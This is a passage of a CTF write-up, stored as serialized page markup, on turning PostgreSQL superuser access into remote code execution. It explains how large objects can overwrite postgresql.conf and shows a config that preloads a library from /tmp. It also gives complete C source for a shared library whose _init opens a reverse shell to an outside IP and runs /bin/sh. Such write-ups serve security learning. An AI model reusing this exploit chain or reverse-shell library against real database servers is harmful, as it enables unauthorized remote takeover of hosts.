appuser;\n",{"type":34,"tag":315,"props":3587,"children":3588},{"class":317,"line":578},[3589],{"type":34,"tag":315,"props":3590,"children":3591},{"style":360},[3592],{"type":39,"value":3593},"\\c appdb\n",{"type":34,"tag":315,"props":3595,"children":3596},{"class":317,"line":619},[3597],{"type":34,"tag":315,"props":3598,"children":3599},{"style":360},[3600],{"type":39,"value":3601},"GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\n",{"type":34,"tag":315,"props":3603,"children":3604},{"class":317,"line":671},[3605],{"type":34,"tag":315,"props":3606,"children":3607},{"style":360},[3608],{"type":39,"value":3609},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\n",{"type":34,"tag":315,"props":3611,"children":3612},{"class":317,"line":680},[3613],{"type":34,"tag":315,"props":3614,"children":3615},{"style":360},[3616],{"type":39,"value":3617},"GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\n",{"type":34,"tag":315,"props":3619,"children":3620},{"class":317,"line":697},[3621],{"type":34,"tag":315,"props":3622,"children":3623},{"style":360},[3624],{"type":39,"value":3625},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\n",{"type":34,"tag":315,"props":3627,"children":3628},{"class":317,"line":707},[3629,3634],{"type":34,"tag":315,"props":3630,"children":3631},{"style":360},[3632],{"type":39,"value":3633},"EOF",{"type":34,"tag":315,"props":3635,"children":3636},{"style":354},[3637],{"type":39,"value":2820},{"type":34,"tag":315,"props":3639,"children":3640},{"class":317,"line":1805},[3641,3645,3649],{"type":34,"tag":315,"props":3642,"children":3643},{"style":338},[3644],{"type":39,"value":3480},{"type":34,"tag":315,"props":3646,"children":3647},{"style":701},[3648],{"type":39,"value":3485},{"type":34,"tag":315,"props":3650,"children":3651},{"style":338},[3652],{"type":39,"value":3490},{"type":34,"tag":48,"props":3654,"children":3655},{},[3656,3658,3667],{"type":39,"value":3657},"With superuser account, It is then possible to use large objects. Briefly, large objects are types in PostgreSQL that allow storing larger quantities of data than classical types like text or bytea. Large objects also allow reading and writing to the filesystem. If you want to see another writeup dealing with PostgreSQL large objects, you can check out another writeup I made on a ",{"type":34,"tag":3659,"props":3660,"children":3664},"a",{"href":3661,"rel":3662},"https://owalid.com/writeups/chatter-box#from-postgresqli-to-rce-unintended",[3663],"nofollow",[3665],{"type":39,"value":3666},"RealWorldCTF 2024 Chatter-box",{"type":39,"value":66},{"type":34,"tag":48,"props":3669,"children":3670},{},[3671],{"type":39,"value":3672},"Basically, with a database account that can use large objects, it is quite simple to achieve RCE only with SELECT clause.",{"type":34,"tag":48,"props":3674,"children":3675},{},[3676,3678,3684,3686,3692,3694,3700],{"type":39,"value":3677},"The PostgreSQL server follows a configuration written in a file called ",{"type":34,"tag":59,"props":3679,"children":3681},{"className":3680},[],[3682],{"type":39,"value":3683},"postgresql.conf",{"type":39,"value":3685}," which is generally located in the Unix user ",{"type":34,"tag":59,"props":3687,"children":3689},{"className":3688},[],[3690],{"type":39,"value":3691},"postgres",{"type":39,"value":3693}," home directory. Some configuration entries don't require server restart for the configuration changes to take effect; it's possible to simply call the ",{"type":34,"tag":59,"props":3695,"children":3697},{"className":3696},[],[3698],{"type":39,"value":3699},"pg_reload_conf()",{"type":39,"value":3701}," function in an SQL query.",{"type":34,"tag":48,"props":3703,"children":3704},{},[3705],{"type":39,"value":3706},"Thanks to large objects, it is then possible to overwrite the configuration file with a configuration that would allow us to achieve RCE.",{"type":34,"tag":48,"props":3708,"children":3709},{},[3710],{"type":39,"value":3711},"Several techniques exist:",{"type":34,"tag":79,"props":3713,"children":3714},{},[3715,3734,3752],{"type":34,"tag":83,"props":3716,"children":3717},{},[3718,3724,3726,3733],{"type":34,"tag":59,"props":3719,"children":3721},{"className":3720},[],[3722],{"type":39,"value":3723},"ssl_passphrase_command",{"type":39,"value":3725}," (by ",{"type":34,"tag":3659,"props":3727,"children":3730},{"href":3728,"rel":3729},"https://pulsesecurity.co.nz/articles/postgres-sqli",[3663],[3731],{"type":39,"value":3732},"Denis Andzakovic",{"type":39,"value":177},{"type":34,"tag":83,"props":3735,"children":3736},{},[3737,3743,3744,3751],{"type":34,"tag":59,"props":3738,"children":3740},{"className":3739},[],[3741],{"type":39,"value":3742},"archive_command",{"type":39,"value":3725},{"type":34,"tag":3659,"props":3745,"children":3748},{"href":3746,"rel":3747},"https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3",[3663],[3749],{"type":39,"value":3750},"sylsTyping",{"type":39,"value":177},{"type":34,"tag":83,"props":3753,"children":3754},{},[3755,3761,3762,3769],{"type":34,"tag":59,"props":3756,"children":3758},{"className":3757},[],[3759],{"type":39,"value":3760},"session_preload_libraries",{"type":39,"value":3725},{"type":34,"tag":3659,"props":3763,"children":3766},{"href":3764,"rel":3765},"https://adeadfed.com/posts/postgresql-select-only-rce/",[3663],[3767],{"type":39,"value":3768},"adeadfed",{"type":39,"value":177},{"type":34,"tag":48,"props":3771,"children":3772},{},[3773,3775,3780],{"type":39,"value":3774},"At first, I tried to exploit it in the same way as during RealWorldCTF using the ",{"type":34,"tag":59,"props":3776,"children":3778},{"className":3777},[],[3779],{"type":39,"value":3723},{"type":39,"value":3781}," configuration, but the exploit didn't seem to work with the challenge configuration, so I focused on the configuration with the library.",{"type":34,"tag":301,"props":3783,"children":3785},{"lang":3784},"conf",[3786],{"type":34,"tag":306,"props":3787,"children":3790},{"className":3788,"code":3789,"language":3784,"meta":7,"style":7},"language-conf shiki shiki-themes vitesse-dark","# - Shared Library Preloading -\n\nsession_preload_libraries = 'payload.so'\n#shared_preload_libraries = ''      # (change requires restart)\n#jit_provider = 'llvmjit'       # JIT library to use\n\n# - Other Defaults -\n\ndynamic_library_path = '/tmp:$libdir'\n#gin_fuzzy_search_limit = 0\n",[3791],{"type":34,"tag":59,"props":3792,"children":3793},{"__ignoreMap":7},[3794,3802,3809,3817,3825,3833,3840,3848,3855,3863],{"type":34,"tag":315,"props":3795,"children":3796},{"class":317,"line":318},[3797],{"type":34,"tag":315,"props":3798,"children":3799},{},[3800],{"type":39,"value":3801},"# - Shared Library Preloading -\n",{"type":34,"tag":315,"props":3803,"children":3804},{"class":317,"line":328},[3805],{"type":34,"tag":315,"props":3806,"children":3807},{"emptyLinePlaceholder":545},[3808],{"type":39,"value":548},{"type":34,"tag":315,"props":3810,"children":3811},{"class":317,"line":423},[3812],{"type":34,"tag":315,"props":3813,"children":3814},{},[3815],{"type":39,"value":3816},"session_preload_libraries = 'payload.so'\n",{"type":34,"tag":315,"props":3818,"children":3819},{"class":317,"line":471},[3820],{"type":34,"tag":315,"props":3821,"children":3822},{},[3823],{"type":39,"value":3824},"#shared_preload_libraries = ''      # (change requires restart)\n",{"type":34,"tag":315,"props":3826,"children":3827},{"class":317,"line":485},[3828],{"type":34,"tag":315,"props":3829,"children":3830},{},[3831],{"type":39,"value":3832},"#jit_provider = 'llvmjit'       # JIT library to use\n",{"type":34,"tag":315,"props":3834,"children":3835},{"class":317,"line":541},[3836],{"type":34,"tag":315,"props":3837,"children":3838},{"emptyLinePlaceholder":545},[3839],{"type":39,"value":548},{"type":34,"tag":315,"props":3841,"children":3842},{"class":317,"line":551},[3843],{"type":34,"tag":315,"props":3844,"children":3845},{},[3846],{"type":39,"value":3847},"# - Other Defaults -\n",{"type":34,"tag":315,"props":3849,"children":3850},{"class":317,"line":570},[3851],{"type":34,"tag":315,"props":3852,"children":3853},{"emptyLinePlaceholder":545},[3854],{"type":39,"value":548},{"type":34,"tag":315,"props":3856,"children":3857},{"class":317,"line":578},[3858],{"type":34,"tag":315,"props":3859,"children":3860},{},[3861],{"type":39,"value":3862},"dynamic_library_path = '/tmp:$libdir'\n",{"type":34,"tag":315,"props":3864,"children":3865},{"class":317,"line":619},[3866],{"type":34,"tag":315,"props":3867,"children":3868},{},[3869],{"type":39,"value":3870},"#gin_fuzzy_search_limit = 0\n",{"type":34,"tag":48,"props":3872,"children":3873},{},[3874,3876,3882,3884,3890,3892,3898],{"type":39,"value":3875},"Here our final rce payload will be named ",{"type":34,"tag":59,"props":3877,"children":3879},{"className":3878},[],[3880],{"type":39,"value":3881},"payload.so",{"type":39,"value":3883}," and will be in the ",{"type":34,"tag":59,"props":3885,"children":3887},{"className":3886},[],[3888],{"type":39,"value":3889},"/tmp",{"type":39,"value":3891}," directory which we can see through the ",{"type":34,"tag":59,"props":3893,"children":3895},{"className":3894},[],[3896],{"type":39,"value":3897},"dynamic_librairy_path",{"type":39,"value":3899}," entry.",{"type":34,"tag":48,"props":3901,"children":3902},{},[3903],{"type":39,"value":3904},"Our code that will need to be compiled is this:",{"type":34,"tag":301,"props":3906,"children":3908},{"lang":3907},"c",[3909],{"type":34,"tag":306,"props":3910,"children":3913},{"className":3911,"code":3912,"language":3907,"meta":7,"style":7},"language-c shiki shiki-themes vitesse-dark","// payload.c\n#include \u003Cstdio.h>\n#include \u003Csys/socket.h>\n#include \u003Csys/types.h>\n#include \u003Cstdlib.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet/in.h>\n#include \u003Carpa/inet.h>\n#include \"postgres.h\"\n#include \"fmgr.h\"\n\n#ifdef PG_MODULE_MAGIC\nPG_MODULE_MAGIC;\n#endif\n\nvoid _init() {\n    /*\n        code taken from https://www.revshells.com/\n    */\n\n    int port = 9999;\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;\n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr(\"[REDACTED]\");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr,\n    sizeof(revsockaddr));\n    dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {\"/bin/sh\", NULL};\n    execve(\"/bin/sh\", argv, NULL);\n}\n",[3914],{"type":34,"tag":59,"props":3915,"children":3916},{"__ignoreMap":7},[3917,3925,3952,3976,4000,4024,4048,4072,4096,4120,4144,4151,4168,4180,4192,4199,4221,4229,4237,4245,4253,4280,4298,4306,4359,4390,4429,4485,4493,4553,4575,4604,4633,4662,4670,4734,4779],{"type":34,"tag":315,"props":3918,"children":3919},{"class":317,"line":318},[3920],{"type":34,"tag":315,"props":3921,"children":3922},{"style":322},[3923],{"type":39,"value":3924},"// payload.c\n",{"type":34,"tag":315,"props":3926,"children":3927},{"class":317,"line":328},[3928,3933,3938,3943,3948],{"type":34,"tag":315,"props":3929,"children":3930},{"style":338},[3931],{"type":39,"value":3932},"#",{"type":34,"tag":315,"props":3934,"children":3935},{"style":475},[3936],{"type":39,"value":3937},"include",{"type":34,"tag":315,"props":3939,"children":3940},{"style":354},[3941],{"type":39,"value":3942}," \u003C",{"type":34,"tag":315,"props":3944,"children":3945},{"style":360},[3946],{"type":39,"value":3947},"stdio.h",{"type":34,"tag":315,"props":3949,"children":3950},{"style":354},[3951],{"type":39,"value":909},{"type":34,"tag":315,"props":3953,"children":3954},{"class":317,"line":423},[3955,3959,3963,3967,3972],{"type":34,"tag":315,"props":3956,"children":3957},{"style":338},[3958],{"type":39,"value":3932},{"type":34,"tag":315,"props":3960,"children":3961},{"style":475},[3962],{"type":39,"value":3937},{"type":34,"tag":315,"props":3964,"children":3965},{"style":354},[3966],{"type":39,"value":3942},{"type":34,"tag":315,"props":3968,"children":3969},{"style":360},[3970],{"type":39,"value":3971},"sys/socket.h",{"type":34,"tag":315,"props":3973,"children":3974},{"style":354},[3975],{"type":39,"value":909},{"type":34,"tag":315,"props":3977,"children":3978},{"class":317,"line":471},[3979,3983,3987,3991,3996],{"type":34,"tag":315,"props":3980,"children":3981},{"style":338},[3982],{"type":39,"value":3932},{"type":34,"tag":315,"props":3984,"children":3985},{"style":475},[3986],{"type":39,"value":3937},{"type":34,"tag":315,"props":3988,"children":3989},{"style":354},[3990],{"type":39,"value":3942},{"type":34,"tag":315,"props":3992,"children":3993},{"style":360},[3994],{"type":39,"value":3995},"sys/types.h",{"type":34,"tag":315,"props":3997,"children":3998},{"style":354},[3999],{"type":39,"value":909},{"type":34,"tag":315,"props":4001,"children":4002},{"class":317,"line":485},[4003,4007,4011,4015,4020],{"type":34,"tag":315,"props":4004,"children":4005},{"style":338},[4006],{"type":39,"value":3932},{"type":34,"tag":315,"props":4008,"children":4009},{"style":475},[4010],{"type":39,"value":3937},{"type":34,"tag":315,"props":4012,"children":4013},{"style":354},[4014],{"type":39,"value":3942},{"type":34,"tag":315,"props":4016,"children":4017},{"style":360},[4018],{"type":39,"value":4019},"stdlib.h",{"type":34,"tag":315,"props":4021,"children":4022},{"style":354},[4023],{"type":39,"value":909},{"type":34,"tag":315,"props":4025,"children":4026},{"class":317,"line":541},[4027,4031,4035,4039,4044],{"type":34,"tag":315,"props":4028,"children":4029},{"style":338},[4030],{"type":39,"value":3932},{"type":34,"tag":315,"props":4032,"children":4033},{"style":475},[4034],{"type":39,"value":3937},{"type":34,"tag":315,"props":4036,"children":4037},{"style":354},[4038],{"type":39,"value":3942},{"type":34,"tag":315,"props":4040,"children":4041},{"style":360},[4042],{"type":39,"value":4043},"unistd.h",{"type":34,"tag":315,"props":4045,"children":4046},{"style":354},[4047],{"type":39,"value":909},{"type":34,"tag":315,"props":4049,"children":4050},{"class":317,"line":551},[4051,4055,4059,4063,4068],{"type":34,"tag":315,"props":4052,"children":4053},{"style":338},[4054],{"type":39,"value":3932},{"type":34,"tag":315,"props":4056,"children":4057},{"style":475},[4058],{"type":39,"value":3937},{"type":34,"tag":315,"props":4060,"children":4061},{"style":354},[4062],{"type":39,"value":3942},{"type":34,"tag":315,"props":4064,"children":4065},{"style":360},[4066],{"type":39,"value":4067},"netinet/in.h",{"type":34,"tag":315,"props":4069,"children":4070},{"style":354},[4071],{"type":39,"value":909},{"type":34,"tag":315,"props":4073,"children":4074},{"class":317,"line":570},[4075,4079,4083,4087,4092],{"type":34,"tag":315,"props":4076,"children":4077},{"style":338},[4078],{"type":39,"value":3932},{"type":34,"tag":315,"props":4080,"children":4081},{"style":475},[4082],{"type":39,"value":3937},{"type":34,"tag":315,"props":4084,"children":4085},{"style":354},[4086],{"type":39,"value":3942},{"type":34,"tag":315,"props":4088,"children":4089},{"style":360},[4090],{"type":39,"value":4091},"arpa/inet.h",{"type":34,"tag":315,"props":4093,"children":4094},{"style":354},[4095],{"type":39,"value":909},{"type":34,"tag":315,"props":4097,"children":4098},{"class":317,"line":578},[4099,4103,4107,4111,4116],{"type":34,"tag":315,"props":4100,"children":4101},{"style":338},[4102],{"type":39,"value":3932},{"type":34,"tag":315,"props":4104,"children":4105},{"style":475},[4106],{"type":39,"value":3937},{"type":34,"tag":315,"props":4108,"children":4109},{"style":354},[4110],{"type":39,"value":3511},{"type":34,"tag":315,"props":4112,"children":4113},{"style":360},[4114],{"type":39,"value":4115},"postgres.h",{"type":34,"tag":315,"props":4117,"children":4118},{"style":354},[4119],{"type":39,"value":2820},{"type":34,"tag":315,"props":4121,"children":4122},{"class":317,"line":619},[4123,4127,4131,4135,4140],{"type":34,"tag":315,"props":4124,"children":4125},{"style":338},[4126],{"type":39,"value":3932},{"type":34,"tag":315,"props":4128,"children":4129},{"style":475},[4130],{"type":39,"value":3937},{"type":34,"tag":315,"props":4132,"children":4133},{"style":354},[4134],{"type":39,"value":3511},{"type":34,"tag":315,"props":4136,"children":4137},{"style":360},[4138],{"type":39,"value":4139},"fmgr.h",{"type":34,"tag":315,"props":4141,"children":4142},{"style":354},[4143],{"type":39,"value":2820},{"type":34,"tag":315,"props":4145,"children":4146},{"class":317,"line":671},[4147],{"type":34,"tag":315,"props":4148,"children":4149},{"emptyLinePlaceholder":545},[4150],{"type":39,"value":548},{"type":34,"tag":315,"props":4152,"children":4153},{"class":317,"line":680},[4154,4158,4163],{"type":34,"tag":315,"props":4155,"children":4156},{"style":338},[4157],{"type":39,"value":3932},{"type":34,"tag":315,"props":4159,"children":4160},{"style":475},[4161],{"type":39,"value":4162},"ifdef",{"type":34,"tag":315,"props":4164,"children":4165},{"style":343},[4166],{"type":39,"value":4167}," PG_MODULE_MAGIC\n",{"type":34,"tag":315,"props":4169,"children":4170},{"class":317,"line":697},[4171,4176],{"type":34,"tag":315,"props":4172,"children":4173},{"style":701},[4174],{"type":39,"value":4175},"PG_MODULE_MAGIC",{"type":34,"tag":315,"props":4177,"children":4178},{"style":338},[4179],{"type":39,"value":468},{"type":34,"tag":315,"props":4181,"children":4182},{"class":317,"line":707},[4183,4187],{"type":34,"tag":315,"props":4184,"children":4185},{"style":338},[4186],{"type":39,"value":3932},{"type":34,"tag":315,"props":4188,"children":4189},{"style":475},[4190],{"type":39,"value":4191},"endif\n",{"type":34,"tag":315,"props":4193,"children":4194},{"class":317,"line":1805},[4195],{"type":34,"tag":315,"props":4196,"children":4197},{"emptyLinePlaceholder":545},[4198],{"type":39,"value":548},{"type":34,"tag":315,"props":4200,"children":4201},{"class":317,"line":1915},[4202,4207,4212,4217],{"type":34,"tag":315,"props":4203,"children":4204},{"style":384},[4205],{"type":39,"value":4206},"void",{"type":34,"tag":315,"props":4208,"children":4209},{"style":343},[4210],{"type":39,"value":4211}," _init",{"type":34,"tag":315,"props":4213,"children":4214},{"style":338},[4215],{"type":39,"value":4216},"()",{"type":34,"tag":315,"props":4218,"children":4219},{"style":338},[4220],{"type":39,"value":420},{"type":34,"tag":315,"props":4222,"children":4223},{"class":317,"line":1932},[4224],{"type":34,"tag":315,"props":4225,"children":4226},{"style":322},[4227],{"type":39,"value":4228},"    /*\n",{"type":34,"tag":315,"props":4230,"children":4231},{"class":317,"line":2029},[4232],{"type":34,"tag":315,"props":4233,"children":4234},{"style":322},[4235],{"type":39,"value":4236},"        code taken from https://www.revshells.com/\n",{"type":34,"tag":315,"props":4238,"children":4239},{"class":317,"line":2037},[4240],{"type":34,"tag":315,"props":4241,"children":4242},{"style":322},[4243],{"type":39,"value":4244},"    */\n",{"type":34,"tag":315,"props":4246,"children":4248},{"class":317,"line":4247},20,[4249],{"type":34,"tag":315,"props":4250,"children":4251},{"emptyLinePlaceholder":545},[4252],{"type":39,"value":548},{"type":34,"tag":315,"props":4254,"children":4256},{"class":317,"line":4255},21,[4257,4262,4267,4271,4276],{"type":34,"tag":315,"props":4258,"children":4259},{"style":384},[4260],{"type":39,"value":4261},"    int",{"type":34,"tag":315,"props":4263,"children":4264},{"style":701},[4265],{"type":39,"value":4266}," port ",{"type":34,"tag":315,"props":4268,"children":4269},{"style":338},[4270],{"type":39,"value":803},{"type":34,"tag":315,"props":4272,"children":4273},{"style":1463},[4274],{"type":39,"value":4275}," 9999",{"type":34,"tag":315,"props":4277,"children":4278},{"style":338},[4279],{"type":39,"value":468},{"type":34,"tag":315,"props":4281,"children":4283},{"class":317,"line":4282},22,[4284,4289,4294],{"type":34,"tag":315,"props":4285,"children":4286},{"style":384},[4287],{"type":39,"value":4288},"    struct",{"type":34,"tag":315,"props":4290,"children":4291},{"style":701},[4292],{"type":39,"value":4293}," sockaddr_in revsockaddr",{"type":34,"tag":315,"props":4295,"children":4296},{"style":338},[4297],{"type":39,"value":468},{"type":34,"tag":315,"props":4299,"children":4301},{"class":317,"line":4300},23,[4302],{"type":34,"tag":315,"props":4303,"children":4304},{"emptyLinePlaceholder":545},[4305],{"type":39,"value":548},{"type":34,"tag":315,"props":4307,"children":4309},{"class":317,"line":4308},24,[4310,4314,4319,4323,4328,4332,4337,4341,4346,4350,4355],{"type":34,"tag":315,"props":4311,"children":4312},{"style":384},[4313],{"type":39,"value":4261},{"type":34,"tag":315,"props":4315,"children":4316},{"style":701},[4317],{"type":39,"value":4318}," sockt ",{"type":34,"tag":315,"props":4320,"children":4321},{"style":338},[4322],{"type":39,"value":803},{"type":34,"tag":315,"props":4324,"children":4325},{"style":343},[4326],{"type":39,"value":4327}," socket",{"type":34,"tag":315,"props":4329,"children":4330},{"style":338},[4331],{"type":39,"value":351},{"type":34,"tag":315,"props":4333,"children":4334},{"style":701},[4335],{"type":39,"value":4336},"AF_INET",{"type":34,"tag":315,"props":4338,"children":4339},{"style":338},[4340],{"type":39,"value":372},{"type":34,"tag":315,"props":4342,"children":4343},{"style":701},[4344],{"type":39,"value":4345}," SOCK_STREAM",{"type":34,"tag":315,"props":4347,"children":4348},{"style":338},[4349],{"type":39,"value":372},{"type":34,"tag":315,"props":4351,"children":4352},{"style":1463},[4353],{"type":39,"value":4354}," 0",{"type":34,"tag":315,"props":4356,"children":4357},{"style":338},[4358],{"type":39,"value":616},{"type":34,"tag":315,"props":4360,"children":4362},{"class":317,"line":4361},25,[4363,4368,4372,4377,4381,4386],{"type":34,"tag":315,"props":4364,"children":4365},{"style":332},[4366],{"type":39,"value":4367},"    revsockaddr",{"type":34,"tag":315,"props":4369,"children":4370},{"style":338},[4371],{"type":39,"value":66},{"type":34,"tag":315,"props":4373,"children":4374},{"style":332},[4375],{"type":39,"value":4376},"sin_family",{"type":34,"tag":315,"props":4378,"children":4379},{"style":338},[4380],{"type":39,"value":449},{"type":34,"tag":315,"props":4382,"children":4383},{"style":701},[4384],{"type":39,"value":4385}," AF_INET",{"type":34,"tag":315,"props":4387,"children":4388},{"style":338},[4389],{"type":39,"value":468},{"type":34,"tag":315,"props":4391,"children":4393},{"class":317,"line":4392},26,[4394,4398,4402,4407,4411,4416,4420,4425],{"type":34,"tag":315,"props":4395,"children":4396},{"style":332},[4397],{"type":39,"value":4367},{"type":34,"tag":315,"props":4399,"children":4400},{"style":338},[4401],{"type":39,"value":66},{"type":34,"tag":315,"props":4403,"children":4404},{"style":332},[4405],{"type":39,"value":4406},"sin_port",{"type":34,"tag":315,"props":4408,"children":4409},{"style":338},[4410],{"type":39,"value":449},{"type":34,"tag":315,"props":4412,"children":4413},{"style":343},[4414],{"type":39,"value":4415}," htons",{"type":34,"tag":315,"props":4417,"children":4418},{"style":338},[4419],{"type":39,"value":351},{"type":34,"tag":315,"props":4421,"children":4422},{"style":701},[4423],{"type":39,"value":4424},"port",{"type":34,"tag":315,"props":4426,"children":4427},{"style":338},[4428],{"type":39,"value":616},{"type":34,"tag":315,"props":4430,"children":4432},{"class":317,"line":4431},27,[4433,4437,4441,4446,4450,4455,4459,4464,4468,4472,4477,4481],{"type":34,"tag":315,"props":4434,"children":4435},{"style":332},[4436],{"type":39,"value":4367},{"type":34,"tag":315,"props":4438,"children":4439},{"style":338},[4440],{"type":39,"value":66},{"type":34,"tag":315,"props":4442,"children":4443},{"style":332},[4444],{"type":39,"value":4445},"sin_addr",{"type":34,"tag":315,"props":4447,"children":4448},{"style":338},[4449],{"type":39,"value":66},{"type":34,"tag":315,"props":4451,"children":4452},{"style":332},[4453],{"type":39,"value":4454},"s_addr",{"type":34,"tag":315,"props":4456,"children":4457},{"style":338},[4458],{"type":39,"value":449},{"type":34,"tag":315,"props":4460,"children":4461},{"style":343},[4462],{"type":39,"value":4463}," inet_addr",{"type":34,"tag":315,"props":4465,"children":4466},{"style":338},[4467],{"type":39,"value":351},{"type":34,"tag":315,"props":4469,"children":4470},{"style":354},[4471],{"type":39,"value":357},{"type":34,"tag":315,"props":4473,"children":4474},{"style":360},[4475],{"type":39,"value":4476},"[REDACTED]",{"type":34,"tag":315,"props":4478,"children":4479},{"style":354},[4480],{"type":39,"value":357},{"type":34,"tag":315,"props":4482,"children":4483},{"style":338},[4484],{"type":39,"value":616},{"type":34,"tag":315,"props":4486,"children":4488},{"class":317,"line":4487},28,[4489],{"type":34,"tag":315,"props":4490,"children":4491},{"emptyLinePlaceholder":545},[4492],{"type":39,"value":548},{"type":34,"tag":315,"props":4494,"children":4496},{"class":317,"line":4495},29,[4497,4502,4506,4511,4515,4519,4524,4529,4534,4538,4543,4548],{"type":34,"tag":315,"props":4498,"children":4499},{"style":343},[4500],{"type":39,"value":4501},"    connect",{"type":34,"tag":315,"props":4503,"children":4504},{"style":338},[4505],{"type":39,"value":351},{"type":34,"tag":315,"props":4507,"children":4508},{"style":701},[4509],{"type":39,"value":4510},"sockt",{"type":34,"tag":315,"props":4512,"children":4513},{"style":338},[4514],{"type":39,"value":372},{"type":34,"tag":315,"props":4516,"children":4517},{"style":338},[4518],{"type":39,"value":392},{"type":34,"tag":315,"props":4520,"children":4521},{"style":384},[4522],{"type":39,"value":4523},"struct",{"type":34,"tag":315,"props":4525,"children":4526},{"style":701},[4527],{"type":39,"value":4528}," sockaddr ",{"type":34,"tag":315,"props":4530,"children":4531},{"style":384},[4532],{"type":39,"value":4533},"*",{"type":34,"tag":315,"props":4535,"children":4536},{"style":338},[4537],{"type":39,"value":177},{"type":34,"tag":315,"props":4539,"children":4540},{"style":384},[4541],{"type":39,"value":4542}," &",{"type":34,"tag":315,"props":4544,"children":4545},{"style":701},[4546],{"type":39,"value":4547},"revsockaddr",{"type":34,"tag":315,"props":4549,"children":4550},{"style":338},[4551],{"type":39,"value":4552},",\n",{"type":34,"tag":315,"props":4554,"children":4556},{"class":317,"line":4555},30,[4557,4562,4566,4570],{"type":34,"tag":315,"props":4558,"children":4559},{"style":384},[4560],{"type":39,"value":4561},"    sizeof",{"type":34,"tag":315,"props":4563,"children":4564},{"style":338},[4565],{"type":39,"value":351},{"type":34,"tag":315,"props":4567,"children":4568},{"style":701},[4569],{"type":39,"value":4547},{"type":34,"tag":315,"props":4571,"children":4572},{"style":338},[4573],{"type":39,"value":4574},"));\n",{"type":34,"tag":315,"props":4576,"children":4578},{"class":317,"line":4577},31,[4579,4584,4588,4592,4596,4600],{"type":34,"tag":315,"props":4580,"children":4581},{"style":343},[4582],{"type":39,"value":4583},"    dup2",{"type":34,"tag":315,"props":4585,"children":4586},{"style":338},[4587],{"type":39,"value":351},{"type":34,"tag":315,"props":4589,"children":4590},{"style":701},[4591],{"type":39,"value":4510},{"type":34,"tag":315,"props":4593,"children":4594},{"style":338},[4595],{"type":39,"value":372},{"type":34,"tag":315,"props":4597,"children":4598},{"style":1463},[4599],{"type":39,"value":4354},{"type":34,"tag":315,"props":4601,"children":4602},{"style":338},[4603],{"type":39,"value":616},{"type":34,"tag":315,"props":4605,"children":4607},{"class":317,"line":4606},32,[4608,4612,4616,4620,4624,4629],{"type":34,"tag":315,"props":4609,"children":4610},{"style":343},[4611],{"type":39,"value":4583},{"type":34,"tag":315,"props":4613,"children":4614},{"style":338},[4615],{"type":39,"value":351},{"type":34,"tag":315,"props":4617,"children":4618},{"style":701},[4619],{"type":39,"value":4510},{"type":34,"tag":315,"props":4621,"children":4622},{"style":338},[4623],{"type":39,"value":372},{"type":34,"tag":315,"props":4625,"children":4626},{"style":1463},[4627],{"type":39,"value":4628}," 1",{"type":34,"tag":315,"props":4630,"children":4631},{"style":338},[4632],{"type":39,"value":616},{"type":34,"tag":315,"props":4634,"children":4636},{"class":317,"line":4635},33,[4637,4641,4645,4649,4653,4658],{"type":34,"tag":315,"props":4638,"children":4639},{"style":343},[4640],{"type":39,"value":4583},{"type":34,"tag":315,"props":4642,"children":4643},{"style":338},[4644],{"type":39,"value":351},{"type":34,"tag":315,"props":4646,"children":4647},{"style":701},[4648],{"type":39,"value":4510},{"type":34,"tag":315,"props":4650,"children":4651},{"style":338},[4652],{"type":39,"value":372},{"type":34,"tag":315,"props":4654,"children":4655},{"style":1463},[4656],{"type":39,"value":4657}," 2",{"type":34,"tag":315,"props":4659,"children":4660},{"style":338},[4661],{"type":39,"value":616},{"type":34,"tag":315,"props":4663,"children":4665},{"class":317,"line":4664},34,[4666],{"type":34,"tag":315,"props":4667,"children":4668},{"emptyLinePlaceholder":545},[4669],{"type":39,"value":548},{"type":34,"tag":315,"props":4671,"children":4673},{"class":317,"line":4672},35,[4674,4679,4684,4689,4694,4699,4703,4707,4711,4716,4720,4724,4729],{"type":34,"tag":315,"props":4675,"children":4676},{"style":384},[4677],{"type":39,"value":4678},"    char",{"type":34,"tag":315,"props":4680,"children":4681},{"style":384},[4682],{"type":39,"value":4683}," *",{"type":34,"tag":315,"props":4685,"children":4686},{"style":384},[4687],{"type":39,"value":4688}," const",{"type":34,"tag":315,"props":4690,"children":4691},{"style":701},[4692],{"type":39,"value":4693}," argv",{"type":34,"tag":315,"props":4695,"children":4696},{"style":384},[4697],{"type":39,"value":4698},"[]",{"type":34,"tag":315,"props":4700,"children":4701},{"style":338},[4702],{"type":39,"value":449},{"type":34,"tag":315,"props":4704,"children":4705},{"style":338},[4706],{"type":39,"value":434},{"type":34,"tag":315,"props":4708,"children":4709},{"style":354},[4710],{"type":39,"value":357},{"type":34,"tag":315,"props":4712,"children":4713},{"style":360},[4714],{"type":39,"value":4715},"/bin/sh",{"type":34,"tag":315,"props":4717,"children":4718},{"style":354},[4719],{"type":39,"value":357},{"type":34,"tag":315,"props":4721,"children":4722},{"style":338},[4723],{"type":39,"value":372},{"type":34,"tag":315,"props":4725,"children":4726},{"style":475},[4727],{"type":39,"value":4728}," NULL",{"type":34,"tag":315,"props":4730,"children":4731},{"style":338},[4732],{"type":39,"value":4733},"};\n",{"type":34,"tag":315,"props":4735,"children":4737},{"class":317,"line":4736},36,[4738,4743,4747,4751,4755,4759,4763,4767,4771,4775],{"type":34,"tag":315,"props":4739,"children":4740},{"style":343},[4741],{"type":39,"value":4742},"    